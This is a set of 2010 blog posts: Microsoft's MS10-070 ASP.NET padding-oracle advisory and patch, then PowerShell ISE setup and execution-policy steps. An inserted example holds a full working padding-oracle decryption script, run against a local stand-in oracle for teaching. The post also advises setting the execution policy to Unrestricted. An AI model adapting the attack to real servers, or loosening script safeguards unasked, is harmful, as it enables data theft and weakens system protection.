ASP.NET Security Patch

Last week I cross-posted about a security flaw in ASP.NET which could allow an attacker to get access to files on the server.

Microsoft has announced an out-of-band patch for this on Tuesday, September 28, 2010.

Here is the blog post from the Microsoft SharePoint Team blog with details and links.

x-post from the Microsoft Security Response Center blog — The download links for the security updates are in the Security Bulletin.

As we announced yesterday, today we released Security Bulletin MS10-070 out-of-band to address a vulnerability in ASP.NET. The bulletin and the blog by Scott Guthrie, corporate vice president of Microsoft’s .NET Developer Platform, are available for more information.

This security update addresses a vulnerability affecting all versions of the .NET Framework when used on a Windows Server operating system. While desktop systems are listed as affected, consumers are not vulnerable unless they are running a web server from their computer.

The update will be made available initially only through the Microsoft Download Center and then released through Windows Update and Windows Server Update Services within the next few days. This allows customers the option to deploy it manually now without delaying for broader distribution.

For customers who use Automatic Updates, the update will be automatically applied once it is released broadly. Once the Security Update is applied, customers are protected against known attacks related to Security Advisory 2416728.

If you can, please join me and Dustin Childs today for a live webcast where we will cover the details of this bulletin and take customer questions live. Here is the registration information:

Date: Tuesday September 28, 2010
Time: 1:00 p.m. PDT
Click Here to Register

Thanks,
Dave Forstrom
Director, Trustworthy Computing


Big Security Hole for SharePoint Servers

You may have already read this somewhere out there; it is making the rounds across the Twitter-sphere, blogs, and news. But I felt it would be important to post, or I should say re-post, the issue.

Executive Summary from Microsoft Security Advisory 2416728, "Vulnerability in ASP.NET Could Allow Information Disclosure" (http://www.microsoft.com/technet/security/advisory/2416728.mspx):

Microsoft is investigating a new public report of a vulnerability in ASP.NET. An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config. This would allow the attacker to tamper with the contents of the data. By sending back the altered contents to an affected server, the attacker could observe the error codes returned by the server. Microsoft is aware of limited, active attacks at this time. We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

Scott Guthrie has an excellent post up regarding this vulnerability at http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx. As usual, he has gone through with code snippets to explain the issue and what you can do to protect your systems.
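The mechanism the advisory describes (send altered ciphertext back, watch which error the server returns) is the classic CBC padding oracle, and it is worth seeing how little is left of the encryption once such an oracle exists. The script below is an added example written for this page; it is not Microsoft's or Scott Guthrie's code and it does not touch ASP.NET or ViewState. Invoke-Oracle, Protect-Data, New-Cipher and Invoke-PaddingOracleAttack are hypothetical names: Invoke-Oracle is a local stand-in for the vulnerable server, returning only "padding good" or "padding bad" the way the real one leaked it through distinct error responses, and the key and the secret string are constructed inside the script. The attacker side never reads the key. It goes a little beyond the single case in the text: it decrypts a ciphertext of any number of blocks and guards against the well-known false positive on the last byte (a forged block that happens to yield 0x02 0x02 rather than 0x01). It uses RijndaelManaged from mscorlib, so it runs on the PowerShell 2.0 that ships with Windows Server 2008 R2.

```powershell
# Added example, not code from the page: a CBC padding-oracle attack against a
# CONSTRUCTED local oracle. $script:Key is the server's secret; the attack code
# below never reads it, it only calls Invoke-Oracle (hypothetical name).
$script:Key = New-Object byte[] 16
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($script:Key)

function New-Cipher([byte[]]$IV) {
    # RijndaelManaged with a 128-bit block is AES; it lives in mscorlib, so no Add-Type needed on PS 2.0
    $aes = New-Object System.Security.Cryptography.RijndaelManaged
    $aes.BlockSize = 128
    $aes.Mode      = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding   = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key       = $script:Key
    $aes.IV        = $IV
    return $aes
}

function Protect-Data([byte[]]$Plain) {
    # "Server" side: random IV followed by AES-CBC ciphertext, no integrity check
    $iv = New-Object byte[] 16
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($iv)
    $aes = New-Cipher $iv
    $ct  = $aes.CreateEncryptor().TransformFinalBlock($Plain, 0, $Plain.Length)
    return [byte[]]($iv + $ct)
}

function Invoke-Oracle([byte[]]$Data) {
    # The vulnerable behaviour: a padding failure is distinguishable from success.
    # The real server signalled this with a different error response; here it is $true/$false.
    $aes = New-Cipher ([byte[]]$Data[0..15])
    try {
        [void]$aes.CreateDecryptor().TransformFinalBlock($Data, 16, $Data.Length - 16)
        return $true
    } catch [System.Security.Cryptography.CryptographicException] {
        return $false        # "Padding is invalid and cannot be removed."
    }
}

function Invoke-PaddingOracleAttack([byte[]]$Data) {
    # Attacker side: recover every block, last byte first, using only oracle answers
    $blocks = @()
    for ($i = 0; $i -lt $Data.Length; $i += 16) { $blocks += ,([byte[]]$Data[$i..($i + 15)]) }
    $plain = @()
    for ($b = 1; $b -lt $blocks.Count; $b++) {
        $prev   = $blocks[$b - 1]            # genuine previous block (or the IV)
        $target = $blocks[$b]
        $inter  = New-Object byte[] 16       # block-cipher output of $target before the CBC XOR
        for ($pos = 15; $pos -ge 0; $pos--) {
            $pad  = 16 - $pos                # padding value we force the server to see
            $fake = New-Object byte[] 16     # forged "previous block" sent in place of $prev
            for ($k = $pos + 1; $k -lt 16; $k++) { $fake[$k] = $inter[$k] -bxor $pad }
            for ($g = 0; $g -lt 256; $g++) {
                $fake[$pos] = $g
                if (-not (Invoke-Oracle ($fake + $target))) { continue }
                if ($pos -eq 15) {
                    # Rule out the 02 02 false positive: genuine 01 padding survives a change to byte 14
                    $fake[14] = $fake[14] -bxor 0xFF
                    $stillValid = Invoke-Oracle ($fake + $target)
                    $fake[14] = $fake[14] -bxor 0xFF
                    if (-not $stillValid) { continue }
                }
                $inter[$pos] = $g -bxor $pad
                break
            }
        }
        for ($k = 0; $k -lt 16; $k++) { $plain += [byte]($inter[$k] -bxor $prev[$k]) }
    }
    # Strip the PKCS7 padding from the recovered plaintext
    $padLen = [int]$plain[$plain.Length - 1]
    return [byte[]]($plain[0..($plain.Length - 1 - $padLen)])
}

# Constructed demo: encrypt a made-up secret, then recover it with nothing but oracle calls
$secret    = [System.Text.Encoding]::UTF8.GetBytes('constructed secret, not a real ViewState')
$token     = Protect-Data $secret
$recovered = Invoke-PaddingOracleAttack $token
"Recovered without the key: " + [System.Text.Encoding]::UTF8.GetString($recovered)
```

Each plaintext byte costs at most 256 oracle calls and on average 128, so a three-block token falls in a few thousand requests. Note what the oracle does not need: the key, the IV, or any understanding of the data format. That is why the fix had to be on the error-handling side (make every failure look the same to the client) rather than in the cipher, and why the design lesson is to authenticate ciphertext before decrypting it so a tampered message is rejected before padding is ever examined.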

Good luck keeping your systems safe!

PowerShell v2 ISE and Windows Server 2008 R2

After I had gotten my SQL Server installed, I decided the next step in building out the environment was to add some local users with different permissions for services and testing.

Instead of going through and manually clicking to add each of these new users, I decided why not learn a little more PowerShell. So the first thing I did was go to the ‘start globe’ (I know it is not the start menu, but the official/proper name escapes me, plus I like the sound of ‘start globe’) and enter ‘PowerShell ISE’ in the search bar... a few seconds later: nothing, no results.

Since I was more concerned with developing, I went out and downloaded PowerGUI (http://powergui.org). Well, I have returned to the issue, really wanting to use the built-in ISE that is provided, so with some better googling I found an article on TechNet (http://technet.microsoft.com/en-us/library/dd759217.aspx) which provides an overview of the ISE for Windows Server 2008 R2.

The article reviews what the PowerShell ISE is and why it is beneficial for both beginners and advanced users. One of the last sentences contains the missing information I was looking for: "Windows PowerShell ISE is an optional feature." Now I know why I couldn’t find it!

So to get the ISE for use, the steps are simple and straightforward.

1. Open Server Manager

2. In the left-hand navigation tree select Features


3. Next click Add Features. This will launch the "Add Features Wizard"


4. Scroll down until you find Windows PowerShell Integrated Scripting Environment (ISE).

5. Click the check box and then click Next

6. Click Install

7. Now get up and do a few jumping-jacks to keep from getting leg clots, while the progress bar fills…..1…2…3…4…you can do 10, I have confidence in you.

8. Click Close once installation has finished.

9. A search for ISE now gives you two options


10. Now we can use the PowerShell ISE for development.
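The same install from a PowerShell prompt, as an added example that is not part of the original post: Windows Server 2008 R2 ships a ServerManager module whose Add-WindowsFeature cmdlet does what the Add Features Wizard does. It assumes an elevated (Run as administrator) plain PowerShell console, since the ISE is the thing being installed, and that the feature is named PowerShell-ISE as reported by Get-WindowsFeature on that release.

```powershell
# Added example, not from the original post: install the ISE feature from the
# command line on Windows Server 2008 R2. Run from an elevated PowerShell prompt.
Import-Module ServerManager

# Check first. Installed is $false on a fresh box, and the Name column is the
# value Add-WindowsFeature wants (the wizard shows DisplayName instead).
Get-WindowsFeature PowerShell-ISE | Format-Table Name, DisplayName, Installed -AutoSize

# Add it. The result object says whether it worked and whether a reboot is pending.
$result = Add-WindowsFeature PowerShell-ISE
$result | Format-List Success, RestartNeeded, ExitCode

# Confirm with a second query rather than trusting the progress bar
(Get-WindowsFeature PowerShell-ISE).Installed
```

Scripting the install also gives you something the wizard does not: a line you can drop into a build script for the next server, with the Installed check making it safe to re-run.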

Now we can create scripts in a pretty environment, but what about running them? Suppose you have just written a script, simple or for that matter complex, to perform some task, say to write the ever-popular "Hello World!" to the screen. Your script might look like the following:

[screenshot of the script in the ISE]

Now click the little green arrow or press F5. If your system is fresh, the following error message most likely came up:

File cannot be loaded because the execution of scripts is disabled on this system. Please see "get-help about_signing" for more details.

Well, now this is a problem: all we wanted to do was to greet the world from our machine. My understanding is that by default, and for good reason, PowerShell, no matter what level of user you are, will not run a script that has not been digitally signed. You can run your PowerShell prompt as administrator and you will still get this message. It is a security feature to make sure you understand and know what you are about to run. This is great if your grandmother is about to run a script called ‘CatInTheCeiling.ps1’ because her friend told her it was the cutest thing in the world.

But for you and me, who actually want to accomplish some work on our development machine, this is a big slowdown. We don’t want to spend the time digitally signing a small PowerShell script.

The solution is quite simple, only a few steps:

1. Open a PowerShell command prompt or use the bottom window in the ISE.

2. Run this command: Set-ExecutionPolicy Unrestricted

3. Approve the warning

The warning reads: The execution policy helps protect you from scripts that you do not trust.

4. And you are done.

To reverse this setting, use the Default option instead of Unrestricted.

For further details on the Set-ExecutionPolicy cmdlet, check out its entry on TechNet at http://technet.microsoft.com/en-us/library/dd347628.aspx.
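The procedure above works, but Unrestricted is a bigger hammer than a development box needs, and it changes the machine-wide setting for every account. As an added example that is not part of the original post, here is the same change made with a narrower policy and a narrower scope, followed by a constructed Hello World script to prove it took. It assumes PowerShell 2.0 or later (what 2008 R2 ships with), which is where the -Scope and -List parameters and the Get-AuthenticodeSignature cmdlet come from; HelloWorld.ps1 in $env:TEMP is a constructed file written by the script itself.

```powershell
# Added example, not from the original post: a more precise execution-policy change.

# Every scope, highest precedence first; the effective policy is the first entry
# from the top that is not Undefined.
Get-ExecutionPolicy -List

# Restricted (the PowerShell 2.0 default) refuses every .ps1, signed or not.
# RemoteSigned runs scripts written on this machine and only demands a signature
# on files carrying the "downloaded from the Internet" zone marker, which is all a
# developer box usually needs. CurrentUser scope needs no admin rights and leaves
# other accounts and the machine-wide LocalMachine setting alone; -Scope Process
# would affect only this window and vanish when it closes.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser      # answer Y at the prompt, or add -Force

# Confirm what a script will now be judged by
Get-ExecutionPolicy

# Prove it on a constructed script
$script = Join-Path $env:TEMP 'HelloWorld.ps1'
Set-Content -Path $script -Value 'Write-Host "Hello World!"'
(Get-AuthenticodeSignature $script).Status    # NotSigned: fine under RemoteSigned for a local file, blocked under AllSigned
& $script

# Undo: Undefined removes the CurrentUser entry so the lower scope applies again
Set-ExecutionPolicy Undefined -Scope CurrentUser
```

The check worth keeping in mind is the zone marker: a script you download and then run locally is still "remote" to RemoteSigned until the marker is cleared, and that is the one case where this policy behaves differently from the Unrestricted setting in the steps above.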